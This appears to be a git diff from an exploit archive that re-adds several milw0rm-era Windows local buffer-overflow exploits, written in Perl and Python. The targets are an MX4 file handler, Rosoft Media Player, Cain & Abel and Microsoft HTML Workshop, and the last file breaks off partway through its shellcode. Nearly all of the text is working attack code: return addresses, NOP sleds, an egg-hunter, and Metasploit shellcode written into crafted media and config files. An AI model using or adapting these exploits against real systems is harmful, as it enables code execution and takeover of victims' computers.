+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF". + "\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00\x45\x66\x78\x4C\x4C\x49\x53\x54\xDC\x00\x00\x00\x45\x69". + "\x73\x4C\x45\x66\x78\x44\xD0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x4D\x47\x63\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x01\x00\x00\x00\x44\x58\x46\x58\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7F\x00\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00". + "\x00\x00\x45\x69\x66\x78"; + +# win32_exec - EXITFUNC=thread CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +my $shellcode = +"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x53". +"\x9f\x26\xea\x83\xeb\xfc\xe2\xf4\xaf\x77\x62\xea\x53\x9f\xad\xaf". +"\x6f\x14\x5a\xef\x2b\x9e\xc9\x61\x1c\x87\xad\xb5\x73\x9e\xcd\xa3". +"\xd8\xab\xad\xeb\xbd\xae\xe6\x73\xff\x1b\xe6\x9e\x54\x5e\xec\xe7". +"\x52\x5d\xcd\x1e\x68\xcb\x02\xee\x26\x7a\xad\xb5\x77\x9e\xcd\x8c". +"\xd8\x93\x6d\x61\x0c\x83\x27\x01\xd8\x83\xad\xeb\xb8\x16\x7a\xce". +"\x57\x5c\x17\x2a\x37\x14\x66\xda\xd6\x5f\x5e\xe6\xd8\xdf\x2a\x61". +"\x23\x83\x8b\x61\x3b\x97\xcd\xe3\xd8\x1f\x96\xea\x53\x9f\xad\x82". +"\x6f\xc0\x17\x1c\x33\xc9\xaf\x12\xd0\x5f\x5d\xba\x3b\x70\xe8\x0a". 
+"\x33\xf7\xbe\x14\xd9\x91\x71\x15\xb4\xfc\x47\x86\x30\x9f\x26\xea";
+
+my $overflow1 = "\x41" x 316;
+my $overflow2 = "\x41" x 1024;
+my $short_jmp = "\xeb\x06\xff\xff";
+my $ret = "\xf9\x2b\x03\x10"; #universal return address = 0x10032bf9 acuutils.dll
+my $nop_sled = "\x90" x 24;
+
+open(my $mx4_file, "> s.mx4");
+binmode $mx4_file;
+print $mx4_file $mx4_data1.
+ $overflow1.$short_jmp.$ret.$nop_sled.$shellcode.$overflow2.
+ $mx4_data2;
+close($mx4_file);
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/windows/local/7684.pl b/platforms/windows/local/7684.pl
index 539d10c5c..63d71dd2c 100755
--- a/platforms/windows/local/7684.pl
+++ b/platforms/windows/local/7684.pl
@@ -1,41 +1,41 @@
-# Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit(0-day)
-# By:Encrypt3d.M!nd
-#
-# Well,There is a buffer overflow in the program were all the supported types are
-# Affected(m3u,rml,txt),Also Rosoft Media Player treat all the other types as txt so all
-# the types are affected :),and also all the versions are affected
-#
-# Greetz:-=Mizo=-,L!ON,El Mariachi,MiNi SpIder,and all my friends
-# I'm Iraqian...Not Arabian
-
-
-
-# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
-shellcode = (
-"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
-"\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
-"\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
-"\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
-"\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
-"\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f"
-"\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0"
-"\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33"
-"\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f"
-"\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23"
-"\xcc\x21\xdb\x5b")
-
-File = 'encrypt3d.m3u' # change it with what ever you like
-
-eip = "\x6B\x8C\x49\x7E" # Windows XP SP3:user32.dll
-
-chars = "A"*4096
-
-addr = "\xF0\xFF\xFD\x7F" # Writeable address contains 0,NOT 0x00
-
-#addr = "\xE0\x0F\x70\x12" # if the address above not workin try this one
-
-file=open(File,'w')
-file.write(chars+addr+"\x90"*4+eip+"\x90"*10+shellcode)
-file.close()
-
-# milw0rm.com [2009-01-06]
+# Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit(0-day)
+# By:Encrypt3d.M!nd
+#
+# Well,There is a buffer overflow in the program were all the supported types are
+# Affected(m3u,rml,txt),Also Rosoft Media Player treat all the other types as txt so all
+# the types are affected :),and also all the versions are 
affected
+#
+# Greetz:-=Mizo=-,L!ON,El Mariachi,MiNi SpIder,and all my friends
+# I'm Iraqian...Not Arabian
+
+
+
+# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
+shellcode = (
+"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
+"\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
+"\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
+"\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
+"\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
+"\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f"
+"\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0"
+"\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33"
+"\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f"
+"\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23"
+"\xcc\x21\xdb\x5b")
+
+File = 'encrypt3d.m3u' # change it with what ever you like
+
+eip = "\x6B\x8C\x49\x7E" # Windows XP SP3:user32.dll
+
+chars = "A"*4096
+
+addr = "\xF0\xFF\xFD\x7F" # Writeable address contains 0,NOT 0x00
+
+#addr = "\xE0\x0F\x70\x12" # if the address above not workin try this one
+
+file=open(File,'w')
+file.write(chars+addr+"\x90"*4+eip+"\x90"*10+shellcode)
+file.close()
+
+# milw0rm.com [2009-01-06]
diff --git a/platforms/windows/local/7688.pl b/platforms/windows/local/7688.pl
index 9f8d5683a..50cd135e0 100755
--- a/platforms/windows/local/7688.pl
+++ b/platforms/windows/local/7688.pl
@@ -1,50 +1,50 @@
-#!perl -w
-# Simple overflow for Cain & Abel v4.9.25 (and below?)
-# This script will output a file; import this file as a
-# config file under Cracker -> Cisco IOS-MD5 Hashes
-#
-# If Cain crashes but calc.exe isn't run, change $eip to reflect
-# your system.
-#
-# send9 /at/ chiseclabs.com
-
-use strict;
-
-my $eip = "\xD8\x69\x83\x7C"; # 0x7C8369D8 - kernel32.dll, call esp (WinXP SP2)
-my $nop = "\x90" x 4;
-my $pad = "A" x 100;
-
-# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54".
-"\x42\x50\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x53\x4b\x58\x4e\x57".
-"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
-"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x48".
-"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
-"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x54".
-"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x38".
-"\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x32\x46\x30\x43\x4c\x41\x43".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x38\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b".
-"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33".
-"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x47".
-"\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x49".
-"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36".
-"\x4e\x46\x43\x46\x50\x32\x45\x56\x4a\x37\x45\x56\x42\x30\x5a";
-
-my $b00m = $pad . $eip . $nop . $shellcode;
-
-open(BOF,">cain_ios_ex.conf") or die "Error: Can't open a file for writing\n";
-print BOF $b00m;
-close(BOF);
-
-print "Now just open cain_ios_ex.conf as a configuration file under Cracker -> Cisco IOS-MD5 Hashes.\n";
-
-# milw0rm.com [2009-01-07]
+#!perl -w
+# Simple overflow for Cain & Abel v4.9.25 (and below?)
+# This script will output a file; import this file as a
+# config file under Cracker -> Cisco IOS-MD5 Hashes
+#
+# If Cain crashes but calc.exe isn't run, change $eip to reflect
+# your system.
+#
+# send9 /at/ chiseclabs.com
+
+use strict;
+
+my $eip = "\xD8\x69\x83\x7C"; # 0x7C8369D8 - kernel32.dll, call esp (WinXP SP2)
+my $nop = "\x90" x 4;
+my $pad = "A" x 100;
+
+# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54".
+"\x42\x50\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x53\x4b\x58\x4e\x57".
+"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
+"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x48".
+"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
+"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x54".
+"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x38".
+"\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x32\x46\x30\x43\x4c\x41\x43".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x38\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b".
+"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33".
+"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x47".
+"\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x49".
+"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36".
+"\x4e\x46\x43\x46\x50\x32\x45\x56\x4a\x37\x45\x56\x42\x30\x5a";
+
+my $b00m = $pad . $eip . $nop . $shellcode;
+
+open(BOF,">cain_ios_ex.conf") or die "Error: Can't open a file for writing\n";
+print BOF $b00m;
+close(BOF);
+
+print "Now just open cain_ios_ex.conf as a configuration file under Cracker -> Cisco IOS-MD5 Hashes.\n";
+
+# milw0rm.com [2009-01-07]
diff --git a/platforms/windows/local/7727.pl b/platforms/windows/local/7727.pl
index 9f1ddad29..de37c4398 100755
--- a/platforms/windows/local/7727.pl
+++ b/platforms/windows/local/7727.pl
@@ -1,181 +1,181 @@
-#!/usr/bin/perl
-# Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
-# -----------------------------------------------------------------
-# Discovered/Exploit by SkD (skdrat@hotmail.com)
-# -----------------------------------------------------------------
-#
-# This is a continuation of my new method, shellhunting.
-# The exploit is far more advanced than the Amaya's as it runs on
-# every system, partly because the shellhunter itself is very much
-# reliable and universal.
-# The shellhunter does the following tasks to find and exec.
-# shellcode:-
-#
-# 1- Searches through the whole memory of the application.
-# 2- Installs a SEH handler so on access violations it won't
-# stop hunting for the shellcode.
-# 3- Repairs stack so a stack overflow won't occur (that is what
-# happens when the SEH is called up, many PUSH instructions
-# are called from the relevant modules (ntdll, etc).
-# 4- Improved speed by searching through 32 bytes at a time.
-# 5- Uses a certain address in memory to store a variable for the
-# search.
-#
-# It is very stable and will allow any shellcode (bind/reverse shell,
-# dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
-#
-# Yeah, I guess that's about it. Took me a few hours to figure out the
-# whole thing but nothing is impossible ;).
-#
-# Oh, I think some schools use this software :) (it's Microsoft's, right?).
-#
-# You can download the app. from Microsoft's official page:
-# -> http://msdn.microsoft.com/en-us/library/ms669985.aspx
-#
-# If you are interested in my method and want to learn something new or
-# improve your exploitation skills then visit my team's blog at:
-# -> http://abysssec.com
-#
-# Peace out,
-# SkD.
-
-
-
-my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
- "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
- "\x6E\x74\x73\x20\x66\x69\x6C\x65".
- "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
- "\x78\x20\x66\x69\x6C\x65\x3D";
-my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
- "\x0A\x61\x2E\x68\x74\x6D";
-my $crlf = "\x0d\x0a";
-
-# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
-"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46".
-"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32".
-"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b".
-"\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e".
-"\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52".
-"\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36".
-"\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d".
-"\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39".
-"\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b".
-"\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56".
-"\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45".
-"\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49".
-"\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49".
-"\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45".
-"\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b".
-"\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73".
-"\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69".
-"\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31".
-"\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52".
-"\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46";
-
-
-#/----------------Advanced Shellhunter Code----------------\
-#01D717DD EB 1E JMP SHORT 01D717FD |
-#01D717DF 83C4 64 ADD ESP,64 |
-#01D717E2 83C4 64 ADD ESP,64 |
-#01D717E5 83C4 64 ADD ESP,64 |
-#01D717E8 83C4 64 ADD ESP,64 |
-#01D717EB 83C4 64 ADD ESP,64 |
-#01D717EE 83C4 64 ADD ESP,64 |
-#01D717F1 83C4 64 ADD ESP,64 |
-#01D717F4 83C4 64 ADD ESP,64 |
-#01D717F7 83C4 64 ADD ESP,64 |
-#01D717FA 83C4 54 ADD ESP,54 |
-#01D717FD 33FF XOR EDI,EDI |
-#01D717FF BA D0FAFD7F MOV EDX,7FFDFAD0 |
-#01D71804 8B3A MOV EDI,DWORD PTR DS:[EDX] |
-#01D71806 EB 0E JMP SHORT 01D71816 |
-#01D71808 58 POP EAX |
-#01D71809 83E8 3C SUB EAX,3C |
-#01D7180C 50 PUSH EAX |
-#01D7180D 6A FF PUSH -1 |
-#01D7180F 33DB XOR EBX,EBX |
-#01D71811 64:8923 MOV DWORD PTR FS:[EBX],ESP |
-#01D71814 EB 05 JMP SHORT 01D7181B |
-#01D71816 E8 EDFFFFFF CALL 01D71808 |
-#01D7181B B8 12121212 MOV EAX,12121212 |
-#01D71820 6BC0 02 IMUL EAX,EAX,2 |
-#01D71823 BA D0FAFD7F MOV EDX,7FFDFAD0 |
-#01D71828 83C7 20 ADD EDI,20 |
-#01D7182B 893A MOV DWORD PTR DS:[EDX],EDI |
-#01D7182D 3907 CMP DWORD PTR DS:[EDI],EAX |
-#01D7182F ^75 F7 JNZ SHORT 01D71828 |
-#01D71831 83C7 04 ADD EDI,4 |
-#01D71834 6BC0 02 IMUL EAX,EAX,2 |
-#01D71837 3907 CMP DWORD PTR DS:[EDI],EAX |
-#01D71839 ^75 E0 JNZ SHORT 01D7181B |
-#01D7183B 83C7 04 ADD EDI,4 |
-#01D7183E B8 42424242 MOV EAX,42424242 |
-#01D71843 3907 CMP DWORD PTR DS:[EDI],EAX |
-#01D71845 ^75 D4 JNZ SHORT 01D7181B |
-#01D71847 83C7 04 ADD EDI,4 |
-#01D7184A FFE7 JMP EDI |
-#\-----------------------End of Code----------------------/
-
-my $shellhunter = "\xeb\x1e".
- "\x83\xc4\x64".
- "\x83\xc4\x64".
- "\x83\xc4\x64".
- "\x83\xc4\x64".
- "\x83\xc4\x64".
- "\x83\xc4\x64".
- "\x83\xc4\x64".
- "\x83\xc4\x64".
- "\x83\xc4\x64".
- "\x83\xc4\x54".
- "\x33\xff".
- "\xba\xd0\xfa\xfd\x7f".
- "\x8b\x3a".
- "\xeb\x0e".
- "\x58".
- "\x83\xe8\x3c".
- "\x50".
- "\x6a\xff".
- "\x33\xdb".
- "\x64\x89\x23".
- "\xeb\x05".
- "\xe8\xed\xff\xff\xff".
- "\xb8\x12\x12\x12\x12".
- "\x6b\xc0\x02".
- "\xba\xd0\xfa\xfd\x7f".
- "\x83\xc7\x20".
- "\x89\x3a".
- "\x39\x07".
- "\x75\xf7".
- "\x83\xc7\x04".
- "\x6b\xc0\x02".
- "\x39\x07".
- "\x75\xe0".
- "\x83\xc7\x04".
- "\xb8\x42\x42\x42\x42".
- "\x39\x07".
- "\x75\xd4".
- "\x83\xc7\x04".
- "\xff\xe7";
-my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64;
-my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64;
-my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64;
-my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64;
-my $len = 280 - (length($shellhunter) + 55);
-my $overflow1 = "\x41" x $len;
-my $overflow2 = "\x41" x 55;
-my $overflow3 = "\x42" x 256;
-my $ret = "\x93\x1f\x40\x00"; #0x00401f93 CALL EDI [hhw.exe]
-
-
-open(my $hhpprj_file, "> s.hhp");
-print $hhpprj_file $hhp_data1.
- $overflow1.$shellhunter.$overflow2.$ret.
- $crlf.$crlf.
- $hhp_data2.
- $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3.
- $crlf;
-close $hhpprj_file;
-
-# milw0rm.com [2009-01-12]
+#!/usr/bin/perl
+# Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
+# -----------------------------------------------------------------
+# Discovered/Exploit by SkD (skdrat@hotmail.com)
+# -----------------------------------------------------------------
+#
+# This is a continuation of my new method, shellhunting.
+# The exploit is far more advanced than the Amaya's as it runs on
+# every system, partly because the shellhunter itself is very much
+# reliable and universal.
+# The shellhunter does the following tasks to find and exec.
+# shellcode:-
+#
+# 1- Searches through the whole memory of the application.
+# 2- Installs a SEH handler so on access violations it won't
+# stop hunting for the shellcode.
+# 3- Repairs stack so a stack overflow won't occur (that is what
+# happens when the SEH is called up, many PUSH instructions
+# are called from the relevant modules (ntdll, etc).
+# 4- Improved speed by searching through 32 bytes at a time.
+# 5- Uses a certain address in memory to store a variable for the
+# search.
+#
+# It is very stable and will allow any shellcode (bind/reverse shell,
+# dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
+#
+# Yeah, I guess that's about it. Took me a few hours to figure out the
+# whole thing but nothing is impossible ;).
+#
+# Oh, I think some schools use this software :) (it's Microsoft's, right?).
+#
+# You can download the app. from Microsoft's official page:
+# -> http://msdn.microsoft.com/en-us/library/ms669985.aspx
+#
+# If you are interested in my method and want to learn something new or
+# improve your exploitation skills then visit my team's blog at:
+# -> http://abysssec.com
+#
+# Peace out,
+# SkD.
+
+
+
+my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
+ "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
+ "\x6E\x74\x73\x20\x66\x69\x6C\x65".
+ "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
+ "\x78\x20\x66\x69\x6C\x65\x3D";
+my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
+ "\x0A\x61\x2E\x68\x74\x6D";
+my $crlf = "\x0d\x0a";
+
+# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
+"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46".
+"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32".
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b".
+"\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e".
+"\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52".
